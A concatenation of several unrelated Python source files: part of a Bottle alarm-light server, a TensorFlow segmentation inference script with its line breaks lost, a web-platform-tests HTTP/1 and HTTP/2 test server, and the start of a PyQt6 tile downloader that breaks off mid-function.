    def alarmoff():
        # Stop the alarm and leave the light fully on.
        state['alarming'] = False
        esnooze.set()
        state['dim'] = 100
        state['on'] = True
        return dict(state)

    @route('/stat')
    def stat():
        return dict(state)

    @route('/<filepath:path>')
    def servfile(filepath):
        return static_file(filepath,wwwroot)

    run(host='0.0.0.0',port=config.wwwport)

if __name__ == '__main__':
    from time import sleep
    manager = Manager()
    state = manager.dict()
    state['on'] = False
    state['dim'] = 0.
    state['snoozetime'] = config.snoozetime
    state['brightentime'] = config.brightentime
    state['alarmset'] = True
    state['alarmtime'] = config.alarmtime
    state['alarming'] = False
    esnooze = Event()
    l = Process(target=light,args=(1,state))
    l.daemon = True
    l.start()
    w = Process(target=web,args=(1,state,esnooze))
    w.daemon = True
    w.start()
    s = Process(target=scheduler,args=(1,state,esnooze))
    s.daemon = True
    s.start()
    # Keep the parent alive while all three daemons run; exit if any dies.
    while l.is_alive() and w.is_alive() and s.is_alive():
        sleep(1)
inference.py
""" Run inference over a test split """ import argparse import json import logging import logging.config import multiprocessing import os import sys import tensorflow as tf import matplotlib.pyplot as plt import models import datasets import tensortools as tt def decode_tfrecord(example, image_size): """ Decoding clojure passed to the input pipeline. :param example: TFRecord example see dataset module for format details :returns: decoded image """ image = tf.image.decode_image(example["image/data"], dtype=tf.float32, name="DecodeImage") image.set_shape(image_size) file_id = example["id"] return image, file_id class PlotThread(object): def __init__(self, filepaths): self.idx = 0 self.fig = plt.figure() self.ax = self.fig.gca() self.img = None self.filepaths = filepaths def keyboard_callback(self, event): if event.key == "left": self.idx = (self.idx - 1) % len(self.filepaths) elif event.key == "right": self.idx = (self.idx + 1) % len(self.filepaths) self.img = plt.imread(self.filepaths[self.idx]) self.ax.imshow(self.img) self.ax.set_xlabel(os.path.basename(self.filepaths[self.idx])) self.fig.canvas.draw() def __call__(self): # Wait for first image to be processed while len(self.filepaths) == 0: continue self.fig.canvas.mpl_connect("key_press_event", self.keyboard_callback) self.img = plt.imread(self.filepaths[self.idx]) self.ax.imshow(self.img) self.ax.set_xlabel(os.path.basename(self.filepaths[self.idx])) plt.show() def main(args): dataset = None # Retrieve datset if args.dataset == "cityscapes": dataset = datasets.Cityscapes() elif args.dataset == "freiburg": dataset = datasets.Freiburg() else: raise NotImplementedError("Dataset \"%s\" not yet supported." 
% args.dataset) # Configure directories data_dir = dataset.get_test_paths(args.data_dir)[0] if not os.path.exists(args.output): os.makedirs(args.output) # Parse first record and retrieve image dimensions first_record = os.path.join(data_dir, os.listdir(data_dir)[0]) example = tt.tfrecord.tfrecord2example_dict(first_record) example = example["features"]["feature"] height = example["height"]["int64List"]["value"][0] width = example["width"]["int64List"]["value"][0] channels = example["image/channels"]["int64List"]["value"][0] decode_fn = lambda example: decode_tfrecord(example, [height, width, channels]) # Create network and input stage net = models.ENet(dataset.num_classes) input_stage = tt.input.InputStage(input_shape=[height, width, channels]) # Add test set to input stage num_examples = input_stage.add_dataset("test", data_dir, batch_size=1, decode_fn=decode_fn) input_image, file_id = input_stage.get_output() input_image = tf.expand_dims(input_image, axis=0) logits = net(input_image, training=False) p_class = tf.nn.softmax(logits) if args.size is not None: p_class = tf.image.resize_bilinear(logits, args.size) pred = tf.math.argmax(p_class, axis=-1) # Do the reverse embedding from trainId to dataset id if not args.color: pred = tf.expand_dims(pred, axis=-1) embedding = tf.constant(dataset.embedding_reversed, dtype=tf.uint8) pred_embed = tf.gather_nd(embedding, pred) # Expand lost dimension pred_embed = tf.expand_dims(pred_embed, axis=-1) else: pred_embed = tf.gather(dataset.colormap, tf.cast(pred, tf.int32)) pred_embed = tf.cast(pred_embed, tf.uint8) # Encode output image pred_encoding = tf.image.encode_png(pred_embed[0]) # Write encoded file to @args.output_dir output_dir = args.output if output_dir[-1] == "/": output_dir = output_dir[:-1] filename = tf.string_join([file_id, ".png"]) filepath = tf.string_join([output_dir, filename], separator="/") write_file = tf.io.write_file(filepath, pred_encoding) print("Loading checkpoint") # Restore model from checkpoint 
(@args.ckpt) ckpt = tf.train.Checkpoint(model=net) status = ckpt.restore(args.ckpt) print("Checkpoint loaded") if tf.__version__ < "1.14.0": status.assert_existing_objects_matched() else: status.expect_partial() # Create session and restore model sess = tf.Session() status.initialize_or_restore(sess) # Initialize input stage input_stage.init_iterator("test", sess) # Create visualization thread manager = multiprocessing.Manager() filepaths = manager.list() pt = PlotThread(filepaths) p = multiprocessing.Process(target=pt) p.start() # Loop over all images while True: try: _, _file_id, path = sess.run((write_file, file_id, filepath)) filepaths.append(path.decode("ascii")) logger.info("Written processed sample %s" % str(_file_id)) except tf.errors.OutOfRangeError: break logger.info("Inference successfully finished.") p.join() return 0 if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-c", "--checkpoint", type=str, dest="ckpt", required=True, help="Path to checkpoint file." ) parser.add_argument("-d", "--data-dir", type=str, dest="data_dir", required=True, help="Path to dataset test set directory." ) parser.add_argument("-o", "--output", type=str, dest="output", required=True, help="Output directory to store prediction map images." ) parser.add_argument("-t", "--dataset", type=str, dest="dataset", required=True, help="Dataset type: {cityscapes, freiburg}." ) parser.add_argument("-s", "--output-size", type=int, nargs=2, dest="size", required=False, default=None, help="Size of the output images." ) parser.add_argument("--color", action="store_true", required=False, default=False, dest="color") args = parser.parse_args() logger = logging.getLogger(__name__) with open("util/logging.json") as conf: conf_dict = json.load(conf) logging.config.dictConfig(conf_dict) del conf_dict sys.exit(main(args))
server.py
from six.moves import BaseHTTPServer
import errno
import os
import socket
from six.moves.socketserver import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
from six import binary_type, text_type
import uuid
from collections import OrderedDict

from six.moves.queue import Queue

from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RequestReceived, ConnectionTerminated, DataReceived, StreamReset, StreamEnded

from six.moves.urllib.parse import urlsplit, urlunsplit

from . import routes as default_routes
from .config import ConfigBuilder
from .logger import get_logger
from .request import Server, Request, H2Request
from .response import Response, H2Response
from .router import Router
from .utils import HTTPException
from .constants import h2_headers

# We need to stress test that browsers can send/receive many headers (there is
# no specified limit), but the Python stdlib has an arbitrary limit of 100
# headers. Hitting the limit would produce an exception that is silently caught
# in Python 2 but leads to HTTP 431 in Python 3, so we monkey patch it higher.
# https://bugs.python.org/issue26586
# https://github.com/web-platform-tests/wpt/pull/24451
from six.moves import http_client
assert isinstance(getattr(http_client, '_MAXHEADERS'), int)
setattr(http_client, '_MAXHEADERS', 512)


# NOTE: this string is a bare expression, not the module docstring (it does
# not come first in the module); kept for its explanatory value.
"""
HTTP server designed for testing purposes.

The server is designed to provide flexibility in the way that requests are
handled, and to provide control both of exactly what bytes are put on the
wire for the response, and in the timing of sending those bytes.

The server is based on the stdlib HTTPServer, but with some notable
differences in the way that requests are processed. Overall processing is
handled by a WebTestRequestHandler, which is a subclass of
BaseHTTPRequestHandler. This is responsible for parsing the incoming
request. A RequestRewriter is then applied and may change the request data
if it matches a supplied rule.

Once the request data had been finalised, Request and Response objects are
constructed. These are used by the other parts of the system to read
information about the request and manipulate the response.

Each request is handled by a particular handler function. The mapping
between Request and the appropriate handler is determined by a Router. By
default handlers are installed to interpret files under the document root
with .py extensions as executable python files (see handlers.py for the api
for such files), .asis files as bytestreams to be sent literally and all
other files to be served statically.

The handler functions are responsible for either populating the fields of
the response object, which will then be written when the handler returns,
or for directly writing to the output stream.
"""


class RequestRewriter(object):
    def __init__(self, rules):
        """Object for rewriting the request path.

        :param rules: Initial rules to add; a list of three item tuples
                      (method, input_path, output_path), defined as for
                      register()
        """
        self.rules = {}
        for rule in reversed(rules):
            self.register(*rule)
        self.logger = get_logger()

    def register(self, methods, input_path, output_path):
        """Register a rewrite rule.

        :param methods: Set of methods this should match. "*" is a
                        special value indicating that all methods should
                        be matched.

        :param input_path: Path to match for the initial request.

        :param output_path: Path to replace the input path with in
                            the request.
        """
        if isinstance(methods, (binary_type, text_type)):
            methods = [methods]
        self.rules[input_path] = (methods, output_path)

    def rewrite(self, request_handler):
        """Rewrite the path in a BaseHTTPRequestHandler instance, if
        it matches a rule.

        :param request_handler: BaseHTTPRequestHandler for which to
                                rewrite the request.
        """
        split_url = urlsplit(request_handler.path)
        if split_url.path in self.rules:
            methods, destination = self.rules[split_url.path]
            if "*" in methods or request_handler.command in methods:
                self.logger.debug("Rewriting request path %s to %s" %
                                  (request_handler.path, destination))
                new_url = list(split_url)
                new_url[2] = destination
                new_url = urlunsplit(new_url)
                request_handler.path = new_url


class WebTestServer(ThreadingMixIn, BaseHTTPServer.HTTPServer):
    """Threaded HTTP(S)/H2 server; see __init__ for the full parameter docs."""
    allow_reuse_address = True
    acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
    request_queue_size = 2000

    # Ensure that we don't hang on shutdown waiting for requests
    daemon_threads = True

    def __init__(self, server_address, request_handler_cls,
                 router, rewriter, bind_address, config=None,
                 use_ssl=False, key_file=None, certificate=None,
                 encrypt_after_connect=False, latency=None, http2=False, **kwargs):
        """Server for HTTP(s) Requests

        :param server_address: tuple of (server_name, port)

        :param request_handler_cls: BaseHTTPRequestHandler-like class to use
                                    for handling requests.

        :param router: Router instance to use for matching requests to handler
                       functions

        :param rewriter: RequestRewriter-like instance to use for preprocessing
                         requests before they are routed

        :param config: Dictionary holding environment configuration settings
                       for handlers to read, or None to use the default values.

        :param use_ssl: Boolean indicating whether the server should use SSL

        :param key_file: Path to key file to use if SSL is enabled.

        :param certificate: Path to certificate to use if SSL is enabled.

        :param encrypt_after_connect: For each connection, don't start encryption
                                      until a CONNECT message has been received.
                                      This enables the server to act as a
                                      self-proxy.

        :param bind_address True to bind the server to both the IP address and
                            port specified in the server_address parameter.
                            False to bind the server only to the port in the
                            server_address parameter, but not to the address.

        :param latency: Delay in ms to wait before serving each response, or
                        callable that returns a delay in ms
        """
        self.router = router
        self.rewriter = rewriter

        self.scheme = "http2" if http2 else "https" if use_ssl else "http"
        self.logger = get_logger()

        self.latency = latency

        if bind_address:
            hostname_port = server_address
        else:
            hostname_port = ("",server_address[1])

        #super doesn't work here because BaseHTTPServer.HTTPServer is old-style
        BaseHTTPServer.HTTPServer.__init__(self, hostname_port, request_handler_cls, **kwargs)

        if config is not None:
            Server.config = config
        else:
            self.logger.debug("Using default configuration")
            # Fall back to a default config derived from the bound address.
            with ConfigBuilder(browser_host=server_address[0],
                               ports={"http": [self.server_address[1]]}) as config:
                assert config["ssl_config"] is None
                Server.config = config

        self.key_file = key_file
        self.certificate = certificate
        self.encrypt_after_connect = use_ssl and encrypt_after_connect

        if use_ssl and not encrypt_after_connect:
            if http2:
                # h2 requires ALPN negotiation on the TLS handshake.
                ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
                ssl_context.load_cert_chain(keyfile=self.key_file, certfile=self.certificate)
                ssl_context.set_alpn_protocols(['h2'])
                self.socket = ssl_context.wrap_socket(self.socket,
                                                      server_side=True)
            else:
                self.socket = ssl.wrap_socket(self.socket,
                                              keyfile=self.key_file,
                                              certfile=self.certificate,
                                              server_side=True)

    def handle_error(self, request, client_address):
        # Suppress expected disconnect errors; log everything else.
        error = sys.exc_info()[1]

        if ((isinstance(error, socket.error) and
             isinstance(error.args, tuple) and
             error.args[0] in self.acceptable_errors) or
            (isinstance(error, IOError) and
             error.errno in self.acceptable_errors)):
            pass  # remote hang up before the result is sent
        else:
            self.logger.error(traceback.format_exc())


class BaseWebTestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """RequestHandler for WebTestHttpd"""

    def __init__(self, *args, **kwargs):
        self.logger = get_logger()
        BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)

    def finish_handling_h1(self, request_line_is_valid):
        """Route and respond to a parsed HTTP/1.x request."""
        self.server.rewriter.rewrite(self)

        request = Request(self)
        response = Response(self, request)

        if request.method == "CONNECT":
            self.handle_connect(response)
            return

        if not request_line_is_valid:
            # Overlong request line: 414 URI Too Long.
            response.set_error(414)
            response.write()
            return

        self.logger.debug("%s %s" % (request.method, request.request_path))
        handler = self.server.router.get_handler(request)
        self.finish_handling(request, response, handler)

    def finish_handling(self, request, response, handler):
        """Invoke the routed handler and write the response (H1 and H2)."""
        # If the handler we used for the request had a non-default base path
        # set update the doc_root of the request to reflect this
        if hasattr(handler, "base_path") and handler.base_path:
            request.doc_root = handler.base_path
        if hasattr(handler, "url_base") and handler.url_base != "/":
            request.url_base = handler.url_base

        if self.server.latency is not None:
            if callable(self.server.latency):
                latency = self.server.latency()
            else:
                latency = self.server.latency
            self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
            time.sleep(latency / 1000.)

        if handler is None:
            self.logger.debug("No Handler found!")
            response.set_error(404)
        else:
            try:
                handler(request, response)
            except HTTPException as e:
                response.set_error(e.code, e.message)
            except Exception as e:
                self.respond_with_error(response, e)
        self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
                                                request.method,
                                                request.request_path,
                                                request.headers.get('Referer'),
                                                request.raw_input.length))

        if not response.writer.content_written:
            response.write()

        # If a python handler has been used, the old ones won't send a END_STR data frame, so this
        # allows for backwards compatibility by accounting for these handlers that don't close streams
        if isinstance(response, H2Response) and not response.writer.stream_ended:
            response.writer.end_stream()

        # If we want to remove this in the future, a solution is needed for
        # scripts that produce a non-string iterable of content, since these
        # can't set a Content-Length header. A notable example of this kind of
        # problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
        if response.close_connection:
            self.close_connection = True

        if not self.close_connection:
            # Ensure that the whole request has been read from the socket
            request.raw_input.read()

    def handle_connect(self, response):
        """Accept a CONNECT and optionally upgrade the socket to TLS."""
        self.logger.debug("Got CONNECT")
        response.status = 200
        response.write()
        if self.server.encrypt_after_connect:
            self.logger.debug("Enabling SSL for connection")
            self.request = ssl.wrap_socket(self.connection,
                                           keyfile=self.server.key_file,
                                           certfile=self.server.certificate,
                                           server_side=True)
            self.setup()
        return

    def respond_with_error(self, response, e):
        """Turn an unexpected handler exception into a 500 with traceback."""
        message = str(e)
        if message:
            err = [message]
        else:
            err = []
        err.append(traceback.format_exc())
        response.set_error(500, "\n".join(err))


class Http2WebTestRequestHandler(BaseWebTestRequestHandler):
    """Request handler speaking HTTP/2: one connection loop dispatching frames
    to one worker thread per stream."""
    protocol_version = "HTTP/2.0"

    def handle_one_request(self):
        """
        This is the main HTTP/2.0 Handler.

        When a browser opens a connection to the server
        on the HTTP/2.0 port, the server enters this which will initiate the h2 connection
        and keep running throughout the duration of the interaction, and will read/write directly
        from the socket.

        Because there can be multiple H2 connections active at the same
        time, a UUID is created for each so that it is easier to tell them apart in the logs.
        """
        config = H2Configuration(client_side=False)
        self.conn = H2ConnectionGuard(H2Connection(config=config))
        self.close_connection = False

        # Generate a UUID to make it easier to distinguish different H2 connection debug messages
        self.uid = str(uuid.uuid4())[:8]

        self.logger.debug('(%s) Initiating h2 Connection' % self.uid)

        with self.conn as connection:
            connection.initiate_connection()
            data = connection.data_to_send()
            window_size = connection.remote_settings.initial_window_size

        self.request.sendall(data)

        # Dict of { stream_id: (thread, queue) }
        stream_queues = {}

        try:
            while not self.close_connection:
                data = self.request.recv(window_size)
                if data == '':
                    self.logger.debug('(%s) Socket Closed' % self.uid)
                    self.close_connection = True
                    continue

                with self.conn as connection:
                    frames = connection.receive_data(data)
                    window_size = connection.remote_settings.initial_window_size

                self.logger.debug('(%s) Frames Received: ' % self.uid + str(frames))

                for frame in frames:
                    if isinstance(frame, ConnectionTerminated):
                        self.logger.debug('(%s) Connection terminated by remote peer ' % self.uid)
                        self.close_connection = True

                        # Flood all the streams with connection terminated, this will cause them to stop
                        for stream_id, (thread, queue) in stream_queues.items():
                            queue.put(frame)

                    elif hasattr(frame, 'stream_id'):
                        # Lazily create one worker thread + queue per stream.
                        if frame.stream_id not in stream_queues:
                            queue = Queue()
                            stream_queues[frame.stream_id] = (self.start_stream_thread(frame, queue), queue)
                        stream_queues[frame.stream_id][1].put(frame)

                        if isinstance(frame, StreamEnded) or (hasattr(frame, "stream_ended") and frame.stream_ended):
                            del stream_queues[frame.stream_id]

        except (socket.timeout, socket.error) as e:
            self.logger.error('(%s) Closing Connection - \n%s' % (self.uid, str(e)))
            if not self.close_connection:
                self.close_connection = True
                # None is the sentinel telling stream threads to stop.
                for stream_id, (thread, queue) in stream_queues.items():
                    queue.put(None)
        except Exception as e:
            self.logger.error('(%s) Unexpected Error - \n%s' % (self.uid, str(e)))
        finally:
            for stream_id, (thread, queue) in stream_queues.items():
                thread.join()

    def start_stream_thread(self, frame, queue):
        """
        This starts a new thread to handle frames for a specific stream.
        :param frame: The first frame on the stream
        :param queue: A queue object that the thread will use to check for new frames
        :return: The thread object that has already been started
        """
        t = threading.Thread(
            target=Http2WebTestRequestHandler._stream_thread,
            args=(self, frame.stream_id, queue)
        )
        t.start()
        return t

    def _stream_thread(self, stream_id, queue):
        """
        This thread processes frames for a specific stream. It waits for frames to be placed
        in the queue, and processes them. When it receives a request frame, it will
        start processing immediately, even if there are data frames to follow. One of the reasons for this
        is that it can detect invalid requests before needing to read the rest of the frames.
        """

        # The file-like pipe object that will be used to share data to request object if data is received
        wfile = None
        request = None
        response = None
        req_handler = None
        while not self.close_connection:
            # Wait for next frame, blocking
            frame = queue.get(True, None)

            self.logger.debug('(%s - %s) %s' % (self.uid, stream_id, str(frame)))

            if isinstance(frame, RequestReceived):
                # Feed request body bytes to the request object via an OS pipe.
                rfile, wfile = os.pipe()
                rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb')

                stream_handler = H2HandlerCopy(self, frame, rfile)

                stream_handler.server.rewriter.rewrite(stream_handler)
                request = H2Request(stream_handler)
                response = H2Response(stream_handler, request)

                req_handler = stream_handler.server.router.get_handler(request)

                if hasattr(req_handler, "frame_handler"):
                    # Convert this to a handler that will utilise H2 specific functionality, such as handling individual frames
                    req_handler = self.frame_handler(request, response, req_handler)

                if hasattr(req_handler, 'handle_headers'):
                    req_handler.handle_headers(frame, request, response)

            elif isinstance(frame, DataReceived):
                wfile.write(frame.data)

                if hasattr(req_handler, 'handle_data'):
                    req_handler.handle_data(frame, request, response)

                if frame.stream_ended:
                    wfile.close()

            elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
                self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
                break

            if request is not None:
                request.frames.append(frame)

            if hasattr(frame, "stream_ended") and frame.stream_ended:
                self.finish_handling(request, response, req_handler)

    def frame_handler(self, request, response, handler):
        """Instantiate a frame-aware handler, converting failures to errors."""
        try:
            return handler.frame_handler(request)
        except HTTPException as e:
            response.set_error(e.code, e.message)
            response.write()
        except Exception as e:
            self.respond_with_error(response, e)
            response.write()


class H2ConnectionGuard(object):
    """H2Connection objects are not threadsafe, so this keeps thread safety"""
    lock = threading.Lock()

    def __init__(self, obj):
        assert isinstance(obj, H2Connection)
        self.obj = obj

    def __enter__(self):
        self.lock.acquire()
        return self.obj

    def __exit__(self, exception_type, exception_value, traceback):
        self.lock.release()


class H2Headers(dict):
    """Dict of H2 headers exposed under their HTTP/1-style names, while
    keeping the raw (pseudo-)headers in insertion order."""

    def __init__(self, headers):
        self.raw_headers = OrderedDict()
        for key, val in headers:
            self.raw_headers[key] = val
            dict.__setitem__(self, self._convert_h2_header_to_h1(key), val)

    def _convert_h2_header_to_h1(self, header_key):
        # Strip the leading ':' from known H2 pseudo-headers (:method, :path, ...)
        if header_key[1:] in h2_headers and header_key[0] == ':':
            return header_key[1:]
        else:
            return header_key

    # TODO This does not seem relevant for H2 headers, so using a dummy function for now
    def getallmatchingheaders(self, header):
        return ['dummy function']


class H2HandlerCopy(object):
    """Minimal per-stream snapshot of the connection handler, shaped like a
    BaseHTTPRequestHandler so Request/Response construction works for H2."""

    def __init__(self, handler, req_frame, rfile):
        self.headers = H2Headers(req_frame.headers)
        self.command = self.headers['method']
        self.path = self.headers['path']
        self.h2_stream_id = req_frame.stream_id
        self.server = handler.server
        self.protocol_version = handler.protocol_version
        self.client_address = handler.client_address
        self.raw_requestline = ''
        self.rfile = rfile
        self.request = handler.request
        self.conn = handler.conn
class Http1WebTestRequestHandler(BaseWebTestRequestHandler):
    """Request handler for a single HTTP/1.1 connection.

    Reads one request at a time off the socket and dispatches it through
    the server's router via finish_handling_h1().
    """
    protocol_version = "HTTP/1.1"

    def handle_one_request(self):
        """Read and dispatch a single request, keeping the connection alive.

        Socket timeouts close the connection; any other exception is logged
        (and, when a response object exists, reported as a 500).
        """
        response = None
        try:
            self.close_connection = False
            request_line_is_valid = self.get_request_line()
            if self.close_connection:
                return
            request_is_valid = self.parse_request()
            if not request_is_valid:
                # parse_request() actually sends its own error responses
                return
            self.finish_handling_h1(request_line_is_valid)
        except socket.timeout as e:
            self.log_error("Request timed out: %r", e)
            self.close_connection = True
            return
        except Exception:
            err = traceback.format_exc()
            # NOTE(review): `response` is never assigned in this method, so this
            # branch is currently dead — confirm whether finish_handling_h1 was
            # meant to hand a response object back.
            if response:
                response.set_error(500, err)
                response.write()
            self.logger.error(err)

    def get_request_line(self):
        """Read the request line from the socket.

        :return: False when the line is unreadable or longer than 64KiB
                 (the request line is then considered invalid); True
                 otherwise. An empty read marks the connection for closing.
        """
        try:
            self.raw_requestline = self.rfile.readline(65537)
        except socket.error:
            self.close_connection = True
            return False
        # 65537-byte read limit: anything over 64KiB means the client sent an
        # oversized request line.
        if len(self.raw_requestline) > 65536:
            self.requestline = ''
            self.request_version = ''
            self.command = ''
            return False
        if not self.raw_requestline:
            self.close_connection = True
        return True

class WebTestHttpd(object):
    """
    :param host: Host from which to serve (default: 127.0.0.1)
    :param port: Port from which to serve (default: 8000)
    :param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
    :param handler_cls: Class to use for the RequestHandler
    :param use_ssl: Use a SSL server if no explicit server_cls is supplied
    :param key_file: Path to key file to use if ssl is enabled
    :param certificate: Path to certificate file to use if ssl is enabled
    :param encrypt_after_connect: For each connection, don't start encryption
                                  until a CONNECT message has been received.
                                  This enables the server to act as a
                                  self-proxy.
    :param router_cls: Router class to use when matching URLs to handlers
    :param doc_root: Document root for serving files
    :param routes: List of routes with which to initialize the router
    :param rewriter_cls: Class to use for request rewriter
    :param rewrites: List of rewrites with which to initialize the rewriter_cls
    :param config: Dictionary holding environment configuration settings for
                   handlers to read, or None to use the default values.
    :param bind_address: Boolean indicating whether to bind server to IP address.
    :param latency: Delay in ms to wait before serving each response, or
                    callable that returns a delay in ms

    HTTP server designed for testing scenarios.

    Takes a router class which provides one method get_handler which takes a Request
    and returns a handler function.

    .. attribute:: host

      The host name or ip address of the server

    .. attribute:: port

      The port on which the server is running

    .. attribute:: router

      The Router object used to associate requests with resources for this server

    .. attribute:: rewriter

      The Rewriter object used for URL rewriting

    .. attribute:: use_ssl

      Boolean indicating whether the server is using ssl

    .. attribute:: started

      Boolean indicating whether the server is running

    """
    def __init__(self, host="127.0.0.1", port=8000,
                 server_cls=None, handler_cls=Http1WebTestRequestHandler,
                 use_ssl=False, key_file=None, certificate=None,
                 encrypt_after_connect=False, router_cls=Router,
                 doc_root=os.curdir, routes=None,
                 rewriter_cls=RequestRewriter, bind_address=True, rewrites=None,
                 latency=None, config=None, http2=False):
        if routes is None:
            routes = default_routes.routes

        self.host = host

        self.router = router_cls(doc_root, routes)
        self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])

        self.use_ssl = use_ssl
        self.http2 = http2
        self.logger = get_logger()

        if server_cls is None:
            server_cls = WebTestServer

        if use_ssl:
            # BUGFIX: these two messages were swapped — key_file holds the SSL
            # key and certificate holds the certificate.
            if not os.path.exists(key_file):
                raise ValueError("SSL key not found: {}".format(key_file))
            if not os.path.exists(certificate):
                raise ValueError("SSL certificate not found: {}".format(certificate))

        try:
            self.httpd = server_cls((host, port),
                                    handler_cls,
                                    self.router,
                                    self.rewriter,
                                    config=config,
                                    bind_address=bind_address,
                                    use_ssl=use_ssl,
                                    key_file=key_file,
                                    certificate=certificate,
                                    encrypt_after_connect=encrypt_after_connect,
                                    latency=latency,
                                    http2=http2)
            self.started = False

            # Record the port actually bound (important when port=0 asks the
            # OS to pick a free one).
            _host, self.port = self.httpd.socket.getsockname()
        except Exception:
            self.logger.critical("Failed to start HTTP server on port %s; "
                                 "is something already using that port?" % port)
            raise

    def start(self, block=False):
        """Start the server.

        :param block: True to run the server on the current thread, blocking,
                      False to run on a separate thread."""
        http_type = "http2" if self.http2 else "https" if self.use_ssl else "http"
        self.logger.info("Starting %s server on %s:%s" % (http_type, self.host, self.port))
        self.started = True
        if block:
            self.httpd.serve_forever()
        else:
            self.server_thread = threading.Thread(target=self.httpd.serve_forever)
            self.server_thread.daemon = True  # don't hang on exit
            self.server_thread.start()

    def stop(self):
        """
        Stops the server.

        If the server is not running, this method has no effect.
        """
        if self.started:
            try:
                self.httpd.shutdown()
                self.httpd.server_close()
                self.server_thread.join()
                self.server_thread = None
                self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
            except AttributeError:
                pass
            self.started = False
        self.httpd = None

    def get_url(self, path="/", query=None, fragment=None):
        """Return an absolute URL for *path* on this server, or None if the
        server has not been started."""
        if not self.started:
            return None

        return urlunsplit(("http" if not self.use_ssl else "https",
                           "%s:%s" % (self.host, self.port),
                           path, query, fragment))
main.py
# Copyright (c) 2021 W-Mai
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT

# Tile downloader GUI: drag in a JSON job file ({"URL": {...}, "CODES": {...}}),
# then fan the downloads out over 32 worker threads, reporting per-item status
# in a table and overall progress in a progress bar.

from contextlib import closing

import requests
from PyQt6.QtCore import *
from PyQt6.QtWidgets import *
from PyQt6.QtGui import *
import PyQt6.sip

import sys
import os
import json
from typing import *
import threading
from time import sleep
from random import random

# Guards the shared work-item generator and console output across workers.
mutex = threading.Lock()
# Guards progress updates (currently only used by commented-out code).
mutex_ps = threading.Lock()


def abstract_file_path(file):
    # Strip the leading '/' that QUrl.path() prepends on Windows drive paths
    # (e.g. '/C:/foo' -> 'C:/foo').
    # NOTE(review): on POSIX this also strips the root '/', producing a
    # relative path — confirm intended platforms.
    return file.lstrip('/')


def check_file_valid(file):
    # A valid job file is an existing file whose first 8 bytes are exactly
    # the literal prefix b'{"URL":{' of the expected JSON layout.
    if not os.path.isfile(file):
        return False
    print(file)
    with open(file, 'rb') as f:
        mg = f.read(8)
        print(mg)
        return mg == b'{"URL":{'


# Browser-like UA so the tile server does not reject the requests.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'
}
# Per-request timeout in seconds.
timeout = 5


def download(img_url, img_name, out_dir):
    """Download img_url into out_dir/img_name.

    Returns {'code': 0, 'msg': None} on success, or {'code': 1, 'msg': <tag>}
    where the tag encodes the failure: 'S:E' already exists, 'C:<status>' bad
    HTTP status, 'L:0' empty body, 'S:F' filesystem/stream error.
    """
    if os.path.isfile(os.path.join(out_dir, img_name)):
        return {'code': 1, 'msg': 'S:E'}
    with closing(requests.get(img_url, stream=True, headers=headers, timeout=timeout)) as r:
        rc = r.status_code
        # Anything outside 200-299 is a failure.
        if 299 < rc or rc < 200:
            return {'code': 1, 'msg': f'C:{rc}'}
        content_length = int(r.headers.get('content-length', '0'))
        if content_length == 0:
            return {'code': 1, 'msg': f'L:{0}'}
        try:
            if not os.path.exists(out_dir):
                os.makedirs(out_dir)
            with open(os.path.join(out_dir, img_name), 'wb') as f:
                for data in r.iter_content(1024):
                    f.write(data)
        except Exception as e:
            print(e)
            return {'code': 1, 'msg': 'S:F'}
    return {'code': 0, 'msg': None}


class EmptyDelegate(QItemDelegate):
    """Item delegate that suppresses in-place editing of table cells."""

    def __init__(self, parent):
        super(EmptyDelegate, self).__init__(parent)

    def createEditor(self, e1: QWidget, e2: QStyleOptionViewItem, e3: QModelIndex):
        # Returning None means no editor is ever created -> read-only cells.
        return None


class MainWindow(QWidget):
    # Emitted by worker threads after each finished item so the progress bar
    # refresh runs on the GUI thread via the signal/slot connection.
    psSig = pyqtSignal()

    def __init__(self):
        super().__init__()
        self.TotalItem = 0          # total rows queued for download
        self.CurrentFinished = 0    # completed rows (updated by workers)

        self.setAcceptDrops(True)
        self.CurrentFilePath = ''   # accepted job file path
        self.tmpFilePath = ''       # candidate path from dragEnterEvent
        self.CurrentDir = ''        # output directory derived from job file
        self.rawData = {}           # parsed job JSON

        # Initial size and title are set in setUi().
        # Vertical layout: table, progress bar, download button.
        layout = QVBoxLayout()

        listview = QTableView()
        listview.setMinimumHeight(300)
        listview.setModel(QStandardItemModel(0, 2))
        listview.clicked.connect(self.clicked)
        listview.setItemDelegate(EmptyDelegate(self))
        listview.setColumnWidth(0, 150)
        listview.setColumnWidth(1, 80)
        self.model: QStandardItemModel = listview.model()
        self.model.setHorizontalHeaderLabels(["KEY", "STATUS"])

        psProcess = QProgressBar()
        psProcess.setAlignment(Qt.Alignment.AlignCenter)
        psProcess.setValue(0)
        self.psProcess = psProcess

        btDownload = QPushButton()
        btDownload.setMinimumHeight(30)
        btDownload.setText("START DOWNLOAD")
        btDownload.clicked.connect(self.clicked_bt_download)

        layout.addWidget(listview)
        layout.addWidget(psProcess)
        layout.addWidget(btDownload)
        self.list = listview
        self.setLayout(layout)
        self.setUi()

    def setUi(self):
        """Apply fixed window geometry/title and show the window."""
        self.setFixedWidth(300)
        self.setWindowTitle('XLocate Downloader')
        self.show()

    def dragEnterEvent(self, e: QDragEnterEvent):
        # Accept the drag only for a single file that passes the magic-bytes
        # check; remember it so dropEvent can use it.
        data: QMimeData = e.mimeData()
        urls = data.urls()
        if len(urls) == 1:
            path = abstract_file_path(urls[0].path())
            if check_file_valid(path):
